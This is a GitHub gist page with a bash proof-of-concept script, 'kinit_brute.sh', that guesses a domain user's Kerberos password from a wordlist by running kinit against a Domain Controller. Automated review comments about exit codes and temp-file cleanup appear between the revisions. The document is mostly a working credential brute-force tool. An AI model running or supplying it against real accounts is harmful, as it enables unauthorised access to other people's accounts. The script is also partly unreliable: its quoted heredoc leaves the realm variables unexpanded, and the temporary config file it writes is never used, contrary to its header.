Revisions
ropnop revised this gist
Jul 27, 2017. 1 changed file with 1 addition and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients USERNAME=$1 -
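Review bot: the new install hint is appended to the end of the Heimdal compatibility comment, so the sentence about MIT error messages and the `apt-get install heimdal-clients` instruction now run together on one line; put the install step on its own comment line (for example `# Install: apt-get install heimdal-clients`) and drop the leading `$` prompt so the comment reads as an instruction rather than a pasted terminal line.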
ropnop created this gist
Jul 26, 2017.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ #!/bin/bash # Title: kinit_brute.sh # Author: @ropnop # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 DOMAINCONTROLLER=$2 WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}') echo "[+] User: $USERNAME" echo "[+] Kerberos Realm: $DOMAIN" echo "[+] KDC: $DOMAINCONTROLLER" echo "" KRB5_CONF=$(mktemp) cat > $KRB5_CONF <<'asdfasdf' [libdefaults] default_realm = $DOMAIN [realms] $DOMAIN = { kdc = $DOMAINCONTROLLER admin_server = $DOMAINCONTROLLER } asdfasdf while read PASSWORD; do RESULT=$( echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1 ) if [[ $RESULT == *"unable to reach"* ]]; then echo "[!] Unable to find KDC for realm. Check domain and DC" exit 1 fi if [[ $RESULT == *"Wrong realm"* ]]; then echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT != *"Password incorrect"* ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 fi done <$WORDLIST
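Review bot: the success branch (`echo "[+] Found password: $PASSWORD"`) ends with `exit 1`, the same status used for the "Unable to find KDC" and "Wrong realm" error paths, so a caller cannot distinguish a hit from a failure by exit code; use `exit 0` there and reserve non-zero for the error cases and for exhausting the wordlist. Separately, the file created by `KRB5_CONF=$(mktemp)` is never removed on any exit path; a `trap 'rm -f "$KRB5_CONF"' EXIT` after the `mktemp` call would clean it up regardless of which branch terminates the script.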